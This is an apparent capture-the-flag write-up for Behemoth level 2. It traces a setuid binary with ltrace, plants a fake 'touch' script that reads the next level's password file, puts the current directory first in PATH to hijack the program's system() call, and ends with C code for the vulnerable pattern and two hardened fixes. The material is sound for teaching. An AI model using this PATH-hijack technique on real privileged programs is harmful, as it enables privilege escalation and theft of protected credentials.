behemoth2@behemoth$ /behemoth/behemoth2
touch: cannot touch '6014': Permission denied
It executes "touch 6014" but fails with "Permission denied" and then pauses for a long time.
Let's create a temporary folder in /tmp, move to it, then execute the vulnerable file with ltrace:
behemoth2@behemoth$ mkdir /tmp/b2z
behemoth2@behemoth$ cd /tmp/b2z
behemoth2@behemoth:/tmp/b2z$ ltrace /behemoth/behemoth2
__libc_start_main(0x804856b, 1, 0xffffd774, 0x8048660 <unfinished ...>
getpid() = 6018
sprintf("touch 6018", "touch %d", 6018) = 10
__lxstat(3, "6018", 0xffffd640) = -1
unlink("6018") = -1
geteuid() = 13002
geteuid() = 13002
setreuid(13002, 13002) = 0
system("touch 6018" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
It looks in the current directory for a file named after its PID (6018).
If the file exists, it removes it.
Then it sets the real UID to the effective (setuid) UID with setreuid(), so the child keeps the elevated privileges, and executes "touch 6018" via system().
Well, system() hands the command to /bin/sh, which resolves the bare name "touch" through PATH. So we could create a script that prints the content of the password file and name it "touch".
Then add the current directory to PATH and run the vulnerable binary again:
behemoth2@behemoth:/tmp/b2z$ cat > touch
#!/bin/sh
cat /etc/behemoth_pass/behemoth3
^C
behemoth2@behemoth:/tmp/b2z$ chmod +x touch
behemoth2@behemoth:/tmp/b2z$ PATH=.:$PATH
behemoth2@behemoth:/tmp/b2z$ /behemoth/behemoth2
n******l
Pretty easy, isn't it?
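The root cause is a setuid program handing a bare command name to system(), which lets the caller's PATH pick the program that runs. As an added example, not code from this write-up or from the wargame binary, here is that pattern in C beside two hardened replacements; TOUCH_BIN and the function names are my own assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define TOUCH_BIN "/usr/bin/touch"   /* assumed location of touch */

/* Vulnerable pattern, reconstructed from the ltrace output above:
 * system() runs "/bin/sh -c 'touch <pid>'", and the shell resolves the
 * bare name "touch" through whatever PATH the caller exported. In a
 * setuid binary the caller therefore chooses which program runs. */
int touch_via_system(pid_t pid) {
    char cmd[32];
    snprintf(cmd, sizeof cmd, "touch %d", (int)pid);
    return system(cmd);
}

/* Fix 1: no shell at all. Creating an empty file only needs
 * open()/close(), so nothing is looked up through PATH. O_NOFOLLOW
 * also refuses a symlink planted under the predictable "<pid>" name. */
int touch_direct(const char *path) {
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    return close(fd);
}

/* Fix 2: if an external program really is needed, exec it by absolute
 * path with an environment the program builds itself, so PATH and the
 * other inherited variables (IFS, LD_PRELOAD, ...) never come from the
 * caller. Returns the child's exit status, or -1 on failure. */
int touch_exec_fixed(const char *path) {
    pid_t child = fork();
    if (child < 0)
        return -1;
    if (child == 0) {
        char *const argv[] = { "touch", "--", (char *)path, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve(TOUCH_BIN, argv, envp);
        _exit(127);               /* exec failed */
    }
    int status;
    if (waitpid(child, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Either fix removes the PATH lookup; the first also avoids spawning a shell from a privileged process at all.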